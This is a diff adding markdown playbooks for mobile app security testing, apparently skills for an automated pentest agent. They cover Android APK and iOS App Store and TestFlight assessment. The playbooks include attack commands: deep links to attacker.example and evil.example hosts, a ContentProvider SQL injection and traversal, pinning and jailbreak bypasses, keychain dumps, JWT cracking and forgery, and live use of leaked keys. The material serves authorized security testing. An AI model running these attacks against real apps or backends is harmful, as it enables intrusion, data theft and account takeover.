+# MobSF (static+dynamic web UI):  docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf
+```
+
+Pull the artifact from Play by package name (no device needed):
+```
+pip install gplaycli                 # or: npm i -g apkeep / use apkpure/apkmirror mirrors
+gplaycli -d com.example.app -f ./pull/      # downloads base + split APKs
+apkeep -a com.example.app ./pull/           # alternative downloader
+# Reassemble splits into one installable/analyzable APK:
+java -jar APKEditor.jar m -i ./pull/ -o app-universal.apk
+```
+
+Identify, unpack, decompile:
+```
+aapt2 dump badging app-universal.apk | grep -E 'package|launchable|sdkVersion'
+apkid app-universal.apk                       # packer/obfuscator/anti-analysis detection
+apktool d -f app-universal.apk -o app_apktool # smali + decoded AndroidManifest.xml + resources
+jadx -d app_jadx --deobf app-universal.apk    # Java pseudo-source for reading
+keytool -printcert -jarfile app-universal.apk # signing cert / debug-key check
+apksigner verify --print-certs app-universal.apk
+```
+
+Mine the unpacked tree for secrets, endpoints, and backends:
+```
+trufflehog filesystem app_jadx --results=verified,unknown
+gitleaks dir app_apktool --no-banner
+semgrep --config p/mobsf --config p/secrets app_jadx        # mobile-focused rulesets
+grep -rEoh 'https?://[a-zA-Z0-9./?=_%:-]+' app_apktool/ | sort -u   # endpoint inventory
+grep -rEo 'AIza[0-9A-Za-z_-]{35}' app_apktool/               # Google/Firebase API keys
+grep -rEo 'AKIA[0-9A-Z]{16}' app_apktool/                    # AWS access key ids
+strings -n 8 lib/*/*.so | grep -Ei 'http|api|key|token|secret'
+```
+
+Assess the discovered backend like any web asset (use endpoint inventory as the target list):
+```
+httpx -l endpoints.txt -title -tech-detect -status-code -o live.txt
+nuclei -l live.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+katana -u https://api.example.com -jc -o crawl.txt        # expand API surface
+ffuf -u https://api.example.com/FUZZ -w api-wordlist.txt -mc all -fc 404
+jwt_tool <token-from-traffic> -M at                       # tampering/algorithm checks
+```
+
+## Methodology
+
+1. **Acquire**: pull the exact production package by name; capture all splits and the version code so findings map to a real release.
+2. **Triage**: `apkid` for packers/obfuscators (DexGuard, packers, anti-frida) so you choose the right tooling; `aapt2 dump badging` for minSdk/targetSdk and permissions.
+3. **Manifest review**: enumerate every `exported="true"` component, deep-link schemes, `debuggable`, cleartext flags, and `networkSecurityConfig`. These are your highest-value, fastest wins.
+4. **Static secret/endpoint mining**: trufflehog + gitleaks + grep across both apktool and jadx outputs and native `.so` strings. Validate each key live.
+5. **Code review**: jadx for auth flows, crypto usage, WebView config, ContentProvider queries, intent handling, and any client-side gatekeeping (root/pin/IAP/license).
+6. **Dynamic setup**: install on rooted emulator/device, run `frida-server`, attach via objection; disable SSL pinning and root detection to observe real traffic.
+7. **Intercept**: route through an interception proxy with the user-CA trust workaround; map every request/response, headers, tokens, and signing schemes.
+8. **On-device exploitation**: craft `am` intents and ContentProvider queries against exported components from an unprivileged "attacker" app context.
+9. **Backend pivot**: take captured endpoints/tokens and test the server like a web/API asset (authz, IDOR, injection, SSRF, mass-assignment).
+10. **Validate & chain**: prove each finding with a concrete PoC and escalate client-side bugs into account/data/server impact.
+
+## Key Weaknesses / Techniques
+
+**Hardcoded secrets / live keys.** API keys, OAuth client secrets, cloud creds embedded in strings/resources/native libs. Validate a Google API key's reach:
+```
+curl "https://maps.googleapis.com/maps/api/geocode/json?address=test&key=AIza..."   # if it bills, key is live and abusable
+gcloud auth activate-service-account --key-file=found-sa.json   # leaked service-account JSON in assets/
+```
+Firebase pulled from `google-services.json`/strings → probe rules: `curl 'https://<project>-default-rtdb.firebaseio.com/.json'` and Firestore REST.
+
+**Exported components.** Launch and feed data to non-public components from an attacker context:
+```
+adb shell am start -n com.example.app/.SecretActivity --es token x   # forced nav / state change
+adb shell am broadcast -a com.example.app.ADMIN_ACTION --ez isAdmin true
+adb shell am startservice -n com.example.app/.SyncService
+```
+
+**ContentProvider abuse.** Exported or `grantUriPermissions` providers leaking data, allowing SQLi or path traversal:
+```
+adb shell content query --uri content://com.example.app.provider/users
+adb shell content query --uri content://com.example.app.provider/users --where "1=1) UNION SELECT password FROM creds--"
+adb shell content read --uri content://com.example.app.provider/../../../databases/app.db   # traversal
+```
+
+**Deep link / intent redirection.** A deep link that forwards an attacker-supplied URI into a WebView or an `Intent` extra → 1-click webview XSS, token theft, or internal-activity launch:
+```
+adb shell am start -W -a android.intent.action.VIEW -d "examplapp://open?url=https://attacker.example/steal"
+adb shell am start -d "examplapp://redirect?intent=intent://com.example.app/admin#Intent;...end"
+```
+
+**Insecure WebView.** `addJavascriptInterface` + `@JavascriptInterface` methods reachable from loaded content; `setJavaScriptEnabled(true)` with file access or universal access enabled → JS→Java bridge, local file read.
+
+**Broken TLS / pinning bypass + traffic tampering.** Disable client controls, then attack the API directly:
+```
+frida-server &   # on device
+objection -g com.example.app explore -s 'android sslpinning disable; android root disable'
+# or: frida -U -f com.example.app -l ~/frida-scripts/universal-android-ssl-pinning-bypass.js
+```
+
+**Client-side trust (auth/IAP/license/feature flags).** Premium gates, "isAdmin", price, or signature checks enforced only in the client. Patch and re-sign to prove the control is client-side, or just replay/modify the request server-side.
+
+**Weak crypto / insecure storage.** Hardcoded AES keys/IVs, ECB mode, secrets in SharedPreferences/SQLite/external storage. `grep -rE 'AES|DES|ECB|SecretKeySpec|"[A-Fa-f0-9]{32}"' app_jadx`.
+
+## Validation
+
+- **Live secret**: show the embedded key performing a real privileged/billable action against the real backend (Firebase read, cloud API call, third-party API charge) — capture the request and response.
+- **Exported component**: from a separate unprivileged app/`am` invocation, demonstrate a state change, data read, or auth bypass with a screen recording or the returned data.
+- **ContentProvider**: return rows that should be access-controlled (other users' data) via a `content query` PoC.
+- **Pinning/auth bypass**: capture the previously hidden plaintext request, then replay a modified request that the server honors (e.g. another user's `userId` returning their data → IDOR confirmed server-side).
+- **Patch PoC**: when proving a client-side gate, rebuild (`apktool b`), zipalign, sign with your own key (`apksigner sign --ks debug.keystore out.apk`), install, and show the gate bypassed. Note this defeats the client check only — the server-side impact is the real finding.
+
+## False Positives
+
+- Keys that are *designed* to be public (Firebase Web API key, Google Maps key with referrer/SHA-1 restrictions, RUM/analytics public DSNs) — only a finding if the backend lacks rules or the key is unrestricted and billable.
+- `exported="true"` components that perform no sensitive action or re-check identity internally (e.g. require a signature-level permission, validate the calling UID/signature).
+- "Secrets" that are test/staging placeholders, example values, or already-rotated keys — verify each is live before reporting.
+- Deep links that only open benign read-only screens with no parameter trust.
+- Cleartext traffic flag set but no actual HTTP endpoints used; debug builds pulled from a mirror instead of the production listing (confirm version code + signing cert match Play).
+- Decompiler artifacts (jadx mistranslations) that look like bugs but aren't present in smali — cross-check against `apktool` smali.
+
+## Chaining & Impact
+
+- Hardcoded cloud service-account JSON → cloud control-plane access (read buckets, secrets, lateral movement).
+- Permissive Firebase rules discovered via embedded config → read/write all users' data without authenticating.
+- Pinning bypass → captured API token + IDOR in the backend → full account takeover at scale (the client bug merely exposed the server bug).
+- Exported ContentProvider SQLi → exfiltrate the local session token → replay against the server API.
+- Deep-link intent redirection → WebView JS bridge → exfiltrate auth cookies/token → ATO.
+- Embedded third-party SDK secret (e.g. server-side payment key shipped in-app) → fraudulent charges/refunds via the provider's API.
+
+## Pro Tips
+
+- Always pull the production listing by package name and confirm the version code + signing certificate; a debug or repackaged mirror build will produce bugs that don't exist in the real release.
+- Grab **all** split APKs — secrets and native libs frequently live in `config.*` splits, not the base APK. Merge before analysis or you will miss them.
+- Run `apkid` first: a packer/obfuscator changes your whole approach (favor dynamic Frida/objection over static jadx, and dump decrypted DEX from memory).
+- Read smali, not just jadx — obfuscation and decompiler bugs hide logic; the manifest in `apktool` output is decoded faithfully.
+- For Flutter, REST endpoints live in the native `libapp.so` (`strings` it and use reFlutter/blutter); for React Native, decompile `assets/index.android.bundle`; for Unity, inspect `Assembly-CSharp.dll` with a .NET decompiler.
+- Use a fresh OAST domain (`interactsh-client`) inside any URL the app might fetch server-side to confirm backend SSRF originating from the API the app calls.
+- The client is just a map: most durable impact lives in the server-side APIs the app reveals. Mine endpoints and tokens aggressively, then test those like a web/API asset.
+- Validate every key live before reporting; the difference between a public-by-design key and a leaked secret is whether it performs a privileged action against the backend.

--- a/strix/skills/mobile/ios_app_store.md
+++ b/strix/skills/mobile/ios_app_store.md
@@ -1,0 +1,167 @@
+---
+name: ios_app_store
+description: iOS App Store app assessment — acquire the IPA, statically and dynamically analyze the binary, and exploit insecure storage, transport, IPC, and backend trust.
+---
+
+# iOS App Store App
+
+An "iOS App Store" asset is a published app identified by its bundle id or App Store URL (e.g. `id1234567890`). The deliverable is a signed IPA plus the backend it talks to. The attacker's objective: pull the shipped binary, recover hardcoded secrets and endpoints, defeat client-side controls (jailbreak/SSL-pin/biometric gates), and reach the API and cloud backend the app implicitly trusts. The app is just the most authenticated, best-documented client of a server that is the real prize.
+
+## Attack Surface
+
+- **The IPA itself** — Mach-O binary, embedded `Info.plist`, provisioning profile, frameworks, and bundled assets (config plists, JSON, sqlite seeds, certs, JS bundles).
+- **On-device storage** — `NSUserDefaults`, Keychain items, Core Data / sqlite, files in `Documents`/`Library`/`tmp`, plist caches, WebKit caches.
+- **Transport** — REST/GraphQL/gRPC to backends; certificate pinning; ATS exceptions in `Info.plist`.
+- **IPC & deep links** — custom URL schemes (`myapp://`), Universal Links (`apple-app-site-association`), `UIPasteboard`, app extensions, App Groups, `WKWebView` JS bridges.
+- **Client-side trust** — jailbreak detection, SSL pinning, root/integrity checks, feature flags, and authorization decisions made in the app instead of the server.
+- **Third-party SDKs** — analytics, ads, crash reporting, payment SDKs with their own keys, endpoints, and bugs.
+- **Backend & cloud** — the API, plus Firebase/AWS/Azure buckets and keys the app embeds.
+
+## Recon & Enumeration
+
+Acquire the IPA first. From the public App Store listing, identify the bundle id / track id, then obtain the IPA via an authorized device backup, a corporate MDM export, or `ipatool` with your own Apple account:
+
+```bash
+# Resolve listing metadata (bundle id, version, seller) from the store id
+curl -s "https://itunes.apple.com/lookup?id=1234567890" | jq '.results[] | {bundleId, version, sellerName, trackViewUrl}'
+
+# Pull the IPA with your own authenticated Apple ID (authorized testing only)
+go install github.com/majd/ipatool/v2@latest
+ipatool auth login -e you@example.com
+ipatool download -b com.target.app -o target.ipa
+```
+
+Unpack and triage the binary:
+
+```bash
+mkdir -p app && unzip -q target.ipa -d app
+APP=$(ls -d app/Payload/*.app)
+# Info.plist, schemes, ATS, entitlements
+plutil -p "$APP/Info.plist" | less
+codesign -d --entitlements :- "$APP" 2>/dev/null   # or: ldid -e "$APP/<binary>"
+# Mach-O facts: arch, encryption flag, linked libs
+otool -hv "$APP/$(plutil -extract CFBundleExecutable raw "$APP/Info.plist")"
+otool -L "$APP/$(plutil -extract CFBundleExecutable raw "$APP/Info.plist")"
+```
+
+Static analysis tooling (Kali / pip):
+
+```bash
+pip install frida-tools objection            # dynamic instrumentation
+# class-dump / nm / strings for ObjC; jtool2 or otool for Mach-O
+nm -gU "$APP/<binary>" | head; strings -a "$APP/<binary>" | sort -u > strings.txt
+# Full automated scan
+docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf  # MobSF: upload IPA in UI
+```
+
+Hunt secrets and endpoints in the unpacked bundle:
+
+```bash
+trufflehog filesystem app/ --only-verified
+gitleaks dir app/ -v
+grep -RInE 'https?://[a-zA-Z0-9._/-]+' app/ | grep -viE 'apple|schema|w3.org' | sort -u
+grep -RInE '(AKIA|AIza|sk_live|xox[bp]-|eyJ[A-Za-z0-9_-]{10,})' app/   # AWS/Google/Stripe/Slack/JWT
+semgrep --config p/mobsf --config p/secrets app/ 2>/dev/null
+```
+
+Enumerate and probe the backend the app reveals:
+
+```bash
+# Build a host list from extracted URLs, then map exposure
+sort -u hosts.txt | httpx -title -status-code -tech-detect -json -o httpx.json
+subfinder -d api.target.com -silent | dnsx -silent | naabu -top-ports 1000 -silent
+nuclei -l hosts.txt -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -retries 1 -j -o nuclei.jsonl
+wafw00f https://api.target.com
+# Firebase/cloud exposure pulled from the IPA's GoogleService-Info.plist or strings
+trivy fs --scanners secret,misconfig app/
+```
+
+## Methodology
+
+1. **Acquire & verify** — Confirm bundle id and version match the store listing. Decrypt the Mach-O if it is App Store-encrypted (`cryptid 1` in `otool -l`): run on a jailbroken device/sim with `frida-ios-dump` or `bagbak` to dump the in-memory decrypted binary; strings/class-dump are useless on the encrypted blob.
+2. **Static recon** — Parse `Info.plist` for URL schemes, ATS exceptions, background modes; dump entitlements (App Groups, Keychain access groups, associated domains). Enumerate frameworks/SDKs and their versions.
+3. **Secret & endpoint extraction** — trufflehog/gitleaks/semgrep across the bundle; class-dump the ObjC runtime; pull every host/path. Flag API keys, signing secrets, JWT signing material, Firebase configs, S3 buckets.
+4. **Map backend** — httpx/nuclei/naabu the discovered hosts; identify auth scheme (OAuth/JWT/session) and whether authorization is enforced server-side.
+5. **Dynamic setup** — Jailbroken device or arm64 simulator; `frida-server` running; `objection explore` attached to the bundle id.
+6. **Defeat client controls** — Bypass jailbreak detection and SSL pinning so traffic flows through an intercepting proxy.
+7. **Intercept & abuse traffic** — Route through Burp/mitmproxy; replay, tamper, and fuzz API calls; test IDOR, broken auth, mass assignment.
+8. **Inspect runtime storage** — Read Keychain, NSUserDefaults, sqlite, and files after exercising auth/payment flows.
+9. **Attack IPC** — Fuzz custom URL schemes and Universal Links; probe WKWebView bridges and pasteboard leakage.
+10. **Chain to backend/cloud** — Turn extracted keys and weak server-side checks into account takeover, data access, or cloud-resource compromise. Report with PoCs.
+
+## Key Weaknesses / Techniques
+
+- **App Store binary encryption (FairPlay)** — `cryptid 1` means strings/class-dump see ciphertext. Dump decrypted:
+  ```bash
+  frida-ios-dump -u <device-ip> -P <pass> com.target.app   # outputs decrypted .ipa
+  ```
+- **Hardcoded secrets** — Backend API keys, HMAC signing keys, OAuth client secrets, third-party tokens baked into the binary or plists. Validate by using the key against its service (e.g. test an extracted Google Maps/Firebase key, or a Stripe `sk_live_` against `https://api.stripe.com`).
+- **SSL pinning** — Strip it to read traffic. With objection: `objection -g com.target.app explore` then `ios sslpinning disable`. Or a Frida script (`frida -U -f com.target.app -l pinning-bypass.js`) hooking `SecTrustEvaluate`/`NSURLSession` delegates and AFNetworking/Alamofire validators.
+- **Jailbreak detection** — Bypass with `objection`'s `ios jailbreak disable` or a Frida hook on `fileExistsAtPath`, `canOpenURL("cydia://")`, `fork`, and `stat` of `/Applications/Cydia.app`, `/bin/bash`, `/etc/apt`.
+- **Insecure local storage** — Secrets/PII/tokens in `NSUserDefaults`, plaintext sqlite, or cache files instead of Keychain. From objection: `ios nsuserdefaults get`, `ios keychain dump`, `env`, then pull files via `ios cookies get` and `file download`.
+- **Weak ATS** — `NSAllowsArbitraryLoads` or per-domain exceptions in `Info.plist` permit cleartext / weak TLS. Confirm with `plutil -p "$APP/Info.plist" | grep -A20 NSAppTransportSecurity`.
+- **Deep link / URL scheme abuse** — Unvalidated parameters drive sensitive actions or load attacker URLs in a webview:
+  ```bash
+  frida -U com.target.app -e 'ObjC...'   # or trigger from a malicious page:
+  # <a href="myapp://transfer?to=attacker&amount=1000">tap</a>
+  xcrun simctl openurl booted 'myapp://webview?url=https://attacker.example/x'
+  ```
+- **Universal Link / AASA misconfig** — Overly broad `paths` in `apple-app-site-association` can let an attacker-controlled path hijack link handling. Fetch and review:
+  ```bash
+  curl -s https://target.com/.well-known/apple-app-site-association | jq .
+  ```
+- **WKWebView JS bridge** — Exposed native handlers callable from injected JS; combine with a deep link that loads attacker content to reach native functionality.
+- **Broken server-side authz (IDOR/BOLA)** — The app trusts client-supplied ids. Replay intercepted requests swapping object ids / user ids:
+  ```bash
+  sqlmap -r request.txt --batch --level 2          # if a param is injectable
+  jwt_tool eyJ... -X a                              # test alg:none / weak-key JWTs
+  jwt_tool eyJ... -C -d wordlist.txt               # crack HS256 secret
+  ```
+- **Vulnerable bundled SDKs** — Outdated frameworks with known CVEs.
+  ```bash
+  syft "$APP" -o cyclonedx-json=sbom.json && grype sbom:sbom.json
+  ```
+- **Cloud exposure** — Open Firebase RTDB/Firestore or world-readable S3 from embedded config:
+  ```bash
+  curl -s "https://<project>.firebaseio.com/.json"        # 200 + data = open DB
+  awscli s3 ls s3://<bucket-from-strings> --no-sign-request
+  ```
+
+## Validation
+
+- **Decryption** — Re-run `otool -l` on the dumped binary; `cryptid 0` and readable class-dump output confirm a usable decrypted Mach-O.
+- **Secrets** — A finding is real only when the key authenticates: show the live API call it authorizes (Stripe balance read with a test key, Firebase read, signed request accepted by the backend). A revoked/sandbox/expired key is not a finding.
+- **Pinning/JB bypass** — Demonstrate full request/response captured in the proxy after the bypass, with the app still functioning.
+- **Storage** — Show the exact file/Keychain item, the sensitive value, and the user action that wrote it (e.g. auth token in `NSUserDefaults` after login).
+- **Deep link / IDOR** — Provide the concrete URL or HTTP request and the unauthorized state change or data returned, reproduced twice.
+- **Cloud** — Capture the HTTP 200 + sample (redacted) record proving anonymous read/write; stop at minimal proof.
+
+## False Positives
+
+- **Decompiled "secrets" that are public** — App Store public keys, OAuth *client* ids (not secrets), Firebase API keys (which are identifiers, not auth — exposure matters only if rules are open), and sandbox/test keys.
+- **Pinning present but bypassable in lab only** — Defeating pinning on a jailbroken device proves nothing about remote attackers; the real issue is what the now-visible traffic reveals, not the bypass itself.
+- **ATS exceptions for already-HTTPS hosts** — A `NSExceptionAllowsInsecureHTTPLoads:false` entry or an exception scoped to a domain you can't reach is not exploitable.
+- **Strings from frameworks** — URLs/keys belonging to bundled SDKs (Apple, analytics) that the app never uses with privileged scope.
+- **Keychain items with `WhenUnlockedThisDeviceOnly`/biometric ACL** — Proper storage; dumping it on a jailbroken device is expected, not a vuln.
+- **Local-only "tampering"** — Modifying client state on your own device with no server-side effect (e.g. flipping a premium flag the backend re-validates).
+
+## Chaining & Impact
+
+- **Hardcoded backend key → server compromise** — An embedded admin/service key or HMAC secret lets you sign privileged API calls → mass data access or account takeover.
+- **Pinning bypass → traffic analysis → IDOR/BOLA → bulk PII** — Reading the API exposes object-id patterns; iterating ids dumps other users' data.
+- **JWT weakness → impersonation** — Extracted signing secret or `alg:none` acceptance forges arbitrary-user tokens → full account takeover across every client.
+- **Open Firebase/S3 from IPA config → data breach or supply-chain** — World-readable DB leaks PII; world-writable bucket/DB lets you tamper with content served to all users.
+- **Deep link + WKWebView bridge → on-device exploitation** — Malicious link loads attacker JS that calls native handlers → token theft or unauthorized in-app actions from a single tap.
+- **Vulnerable SDK CVE → memory corruption / RCE** in the parsing path it handles.
+
+## Pro Tips
+
+1. The IPA is reconnaissance, not the target — the fastest path to impact is almost always the backend the app authenticates to. Spend the binary effort on endpoints, auth flows, and secrets.
+2. Always check `cryptid` before trusting any static result; App Store binaries are encrypted and strings/class-dump on them are garbage. Dump decrypted first.
+3. Firebase API keys are not secrets — exposure only matters if database/storage *rules* are permissive. Test the rules, not the key.
+4. `objection` gets you 80% there with zero scripting (`ios sslpinning disable`, `ios jailbreak disable`, `ios keychain dump`, `ios nsuserdefaults get`); reach for custom Frida only when hooks are non-standard.
+5. Exercise the app *through* the proxy before dumping storage — tokens, PII, and cache files appear only after real auth/payment flows run.
+6. Diff `Info.plist` URL schemes and the AASA file together: a custom scheme + a broad Universal Link path is a classic link-hijack chain.
+7. Enumerate App Groups and Keychain access groups in entitlements — shared containers between the app and its extensions are a common over-sharing of secrets.
+8. Old app versions leak too: prior IPA builds (from device backups or archives) often still contain rotated-but-still-live keys and removed-but-still-deployed endpoints.
+9. Decompile to find *signing* logic, not just keys — replicating the request-signing algorithm lets you fuzz the API even when pinning and integrity checks are intact.

--- a/strix/skills/mobile/ios_testflight.md
+++ b/strix/skills/mobile/ios_testflight.md
@@ -1,0 +1,176 @@
+---
+name: ios_testflight
+description: iOS TestFlight beta-build assessment — install via TestFlight, capture the IPA, and statically and dynamically analyze the app and its backend.
+---
+
+# iOS TestFlight Build
+
+A TestFlight identifier (an invite code, public link `testflight.apple.com/join/<code>`, or the app's bundle ID) grants access to a pre-release iOS build that is frequently less hardened than App Store releases: debug flags on, verbose logging, staging endpoints, embedded test credentials, and feature flags that are off in production. The attacker's objective is to install the beta, capture the decrypted IPA from a jailbroken or otherwise instrumented device, then assess both the client binary (secrets, weak crypto, broken auth, insecure storage, transport flaws) and the backend it talks to (the real high-value target reachable through the app's API surface).
+
+## Attack Surface
+
+**The build itself**
+- `Payload/<App>.app/<App>` — the FairPlay-encrypted Mach-O (must be decrypted to analyze)
+- `Info.plist` — `CFBundleIdentifier`, URL schemes (`CFBundleURLTypes`), `NSAppTransportSecurity` (ATS) exceptions, associated-domains
+- `embedded.mobileprovision` — provisioning profile, team ID, entitlements, registered test devices/UDIDs
+- `*.plist`, `*.json`, `*.car` (Assets.car), bundled config and feature-flag files
+- Embedded frameworks/dylibs in `Frameworks/`, third-party SDKs, static libs
+
+**Runtime / device**
+- Keychain entries, `NSUserDefaults`, sandbox `Documents/`, `Caches/`, `tmp/`
+- Custom URL schemes and Universal Links (deep-link handlers)
+- IPC: app groups, shared keychain, pasteboard, `WKWebView` JS bridges
+- Local network listeners, background fetch, push (APNs) payload handling
+
+**Backend (primary target)**
+- REST/GraphQL/gRPC APIs the app calls (often staging/QA hosts in beta)
+- Auth flows: OAuth/OIDC, API keys, JWT issuance and refresh
+- Object storage (S3/GCS), CDN, third-party APIs reached with embedded keys
+
+## Recon & Enumeration
+
+Install the iOS-specific toolchain (the PD/web tools — nmap, naabu, httpx, nuclei, ffuf, katana, subfinder, sqlmap, semgrep, trufflehog, gitleaks, trivy, jwt_tool, wafw00f, interactsh-client — are already in the sandbox):
+
+```bash
+pip3 install frida-tools objection                 # dynamic instrumentation
+git clone https://github.com/AloneMonkey/frida-ios-dump  # pull decrypted IPA from device
+# MobSF (static+dynamic mobile scanner) via Docker:
+docker run -it --rm -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
+brew install class-dump 2>/dev/null || true        # class-dump / otool / lipo come with Xcode CLT on macOS hosts
+```
+
+Capture the build from a jailbroken/instrumented device after TestFlight install:
+
+```bash
+# device must be jailbroken with frida-server running; iproxy/usbmuxd forwards SSH
+frida-ps -Uai                                       # list installed apps + bundle IDs
+python3 frida-ios-dump/dump.py -u root -P alpine com.target.app   # -> com.target.app.ipa (decrypted)
+unzip -o com.target.app.ipa -d ipa/                 # explode the bundle
+file ipa/Payload/*.app/<App>                         # confirm Mach-O + 'no crypto' after decryption
+```
+
+Static triage of the unpacked bundle:
+
+```bash
+APP=$(ls -d ipa/Payload/*.app)
+plutil -convert xml1 -o - "$APP/Info.plist"          # URL schemes, ATS, associated domains
+strings -a -n 6 "$APP/$(basename "$APP" .app)" | grep -Ei 'http(s)?://|api|secret|token|key|password|s3\.|firebaseio'
+# secret/key hunting across the whole bundle:
+trufflehog filesystem ipa/ --only-verified --json
+gitleaks dir ipa/ --report-format json --report-path gitleaks.json
+# dependency/CVE view of embedded frameworks:
+trivy fs --scanners vuln,secret ipa/ -f json -o trivy.json
+# decompile for source-level review:
+docker run -v "$PWD":/work -p 8000:8000 opensecurity/mobile-security-framework-mobsf  # then upload the IPA in the UI
+```
+
+Map and probe the discovered backend (feed the hosts/URLs pulled from strings + a proxied run):
+
+```bash
+printf '%s\n' api.target.com staging-api.target.com | dnsx -resp -a    # resolve hosts
+subfinder -d target.com -silent | httpx -silent -json -o web_hosts.jsonl
+naabu -host api.target.com -top-ports 1000 -silent
+nuclei -l web_hosts.jsonl -as -s critical,high -rl 50 -c 20 -bs 20 -timeout 10 -j -o nuclei.jsonl
+katana -u https://staging-api.target.com -jc -kf all -silent | tee crawl.txt
+ffuf -u https://api.target.com/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc all -fc 404
+```
+
+## Methodology
+
+1. **Join + install.** Redeem the TestFlight code / public link, install via the TestFlight app on a controlled test device. Note version, build number, and bundle ID.
+2. **Capture the IPA.** On a jailbroken device, dump the decrypted binary with `frida-ios-dump`; otherwise use a device-side decryptor. Verify the Mach-O `LC_ENCRYPTION_INFO.cryptid == 0` before analysis.
+3. **Bundle inventory.** Unzip, parse `Info.plist`, list `Frameworks/`, dump entitlements from `embedded.mobileprovision` (`security cms -D -i embedded.mobileprovision`).
+4. **Static secret/config sweep.** Run trufflehog/gitleaks/trivy across `ipa/`; pull every URL, key, and feature flag; flag staging vs prod endpoints and ATS exceptions.
+5. **Decompile & review.** Load into MobSF and class-dump/Hopper/Ghidra; review auth, crypto, storage, deep-link, and webview-bridge code; run semgrep on any extracted Swift/Obj-C or JS bridge code.
+6. **Proxy the live app.** Install Burp/mitmproxy CA on the device; defeat TLS pinning with objection/frida; capture the full API conversation and tokens.
+7. **Runtime instrumentation.** Use objection to inspect keychain, `NSUserDefaults`, files, and to bypass jailbreak/pinning checks; hook crypto and auth methods.
+8. **Backend assessment.** Treat captured API traffic as the main attack surface — test authN/authZ (IDOR/BFLA), injection, mass assignment, JWT flaws, and SSRF on the hosts the app reaches.
+9. **Validate & chain.** Build minimal PoCs for each finding; chain client leak → backend access → data/account compromise.
+
+## Key Weaknesses / Techniques
+
+**Hardcoded secrets / over-privileged keys.** Beta builds ship API keys, third-party tokens, and sometimes cloud creds.
+```bash
+trufflehog filesystem ipa/ --only-verified --json | jq -r '.Raw'
+# validate any AWS key found (read-only probe):
+AWS_ACCESS_KEY_ID=AKIA... AWS_SECRET_ACCESS_KEY=... aws sts get-caller-identity
+```
+
+**TLS pinning + traffic capture.** Pinning hides the real API. Disable it at runtime, then proxy.
+```bash
+objection -g com.target.app explore
+# in objection REPL:
+ios sslpinning disable
+ios nsurlsession disable        # for URLSession-based pinning paths
+# point device proxy at mitmproxy:
+mitmproxy --mode regular --listen-port 8080 -w flows.mitm
+```
+
+**Insecure local storage.** Sensitive data in `NSUserDefaults`, plists, or sqlite instead of Keychain (or Keychain with weak `kSecAttrAccessible`).
+```bash
+objection -g com.target.app explore
+ios nsuserdefaults get
+ios keychain dump
+env file ls /var/mobile/Containers/Data/Application/<UUID>/Documents
+```
+
+**Custom URL scheme / Universal Link hijack & injection.** Handlers that trust deep-link params for navigation, auth callbacks, or webview loads.
+```bash
+# enumerate schemes from Info.plist CFBundleURLTypes, then trigger:
+frida -U -n <App> --eval "ObjC.classes" >/dev/null   # confirm attach
+# from a controlled second app / Safari:
+open "targetapp://reset?token=attacker&next=https://evil.example/"
+```
+Look for open-redirect-style `next=`/`returnUrl=` params, OAuth code interception, and `WKWebView` loading attacker-controlled URLs.
+
+**WKWebView JS bridge abuse.** `WKScriptMessageHandler` / `evaluateJavaScript` exposing native functions to web content; with `allowFileAccessFromFileURLs` or loaded remote content this becomes RCE-in-context / local file read.
+
+**Weak crypto & cert validation.** ECB mode, static IVs, hardcoded keys, `NSAllowsArbitraryLoads=true`, or `URLSession` delegates that accept any server trust. Confirm in decompiled code and at runtime by hooking `SecTrustEvaluate`.
+
+**Backend authZ flaws (the payoff).** Replay captured tokens across users/objects.
+```bash
+# IDOR: swap object IDs with a low-priv token
+curl -s https://api.target.com/v1/users/1002/profile -H "Authorization: Bearer $LOWPRIV"
+# JWT weaknesses on the issued token:
+jwt_tool "$TOKEN" -M at -t https://api.target.com/v1/me -rh "Authorization: Bearer $TOKEN"
+jwt_tool "$TOKEN" -X a        # alg:none / key-confusion checks
+# injection on parameters seen in flows.mitm:
+sqlmap -r request.txt --batch --risk 2 --level 3
+```
+
+## Validation
+
+1. **Decryption proof.** `otool -l "$APP/<App>" | grep -A4 LC_ENCRYPTION_INFO` shows `cryptid 0` — analysis is on a real decrypted binary, not a stub.
+2. **Secret is live, not dead.** Don't report a string; prove the key authenticates (e.g., `aws sts get-caller-identity` returns an ARN, or the third-party endpoint returns 200 with the embedded token). Use `trufflehog --only-verified`.
+3. **Pinning bypass confirmed.** Show captured plaintext API requests/responses in `flows.mitm` while the app functions normally.
+4. **Backend finding has a PoC.** A reproducible `curl` with a low-privilege token returning another user's data; an IDOR/BFLA delta between two principals; a JWT forgery accepted by `/me`.
+5. **Storage leak is real.** `ios keychain dump` / file read showing a session token or PII that survives logout or is world-readable within the app sandbox.
+
+## False Positives
+
+- Strings that look like secrets but are public IDs, demo keys, or analytics SDK config (Firebase `apiKey` is not a secret by itself — confirm rules instead).
+- "Hardcoded key" inside a third-party SDK that is documented as a public client identifier.
+- ATS exceptions scoped to a single legitimate domain that already uses valid TLS — only the `NSAllowsArbitraryLoads=true` global, or cleartext to a real host, is a finding.
+- Staging endpoints that are firewalled/unreachable from the internet (verify with httpx/naabu before claiming exposure).
+- A `cryptid 1` binary mistaken for "obfuscated" — it's just still encrypted; re-dump before concluding anything about the code.
+- Pinning "bypass" that actually just disabled networking — confirm the app still receives real responses.
+
+## Chaining & Impact
+
+- Embedded cloud/API key → backend or bucket access → bulk data read → full data breach.
+- Pinning bypass → captured admin/QA token from a beta tester → privileged backend actions in staging that share data or auth with production.
+- Deep-link/OAuth callback hijack → account takeover (steal the authorization code or session via attacker-controlled `redirect`/`next`).
+- Insecure storage → token persists after logout → session hijack on a shared/lost device.
+- JS-bridge + remote webview content → native function invocation → local file exfiltration or action-on-behalf-of-user.
+- Staging API flaw (weaker than prod) → pivot to shared infra/credentials reused in production.
+
+## Pro Tips
+
+1. Beta builds leak more than App Store builds — diff the TestFlight `Info.plist`/endpoints against the production app; staging hosts, debug menus, and verbose logging are common.
+2. Always confirm decryption (`cryptid 0`) before spending time in a disassembler; analyzing an encrypted Mach-O wastes hours.
+3. Pull entitlements early (`security cms -D -i embedded.mobileprovision`) — app groups, associated domains, and keychain-sharing groups reveal IPC and deep-link attack surface.
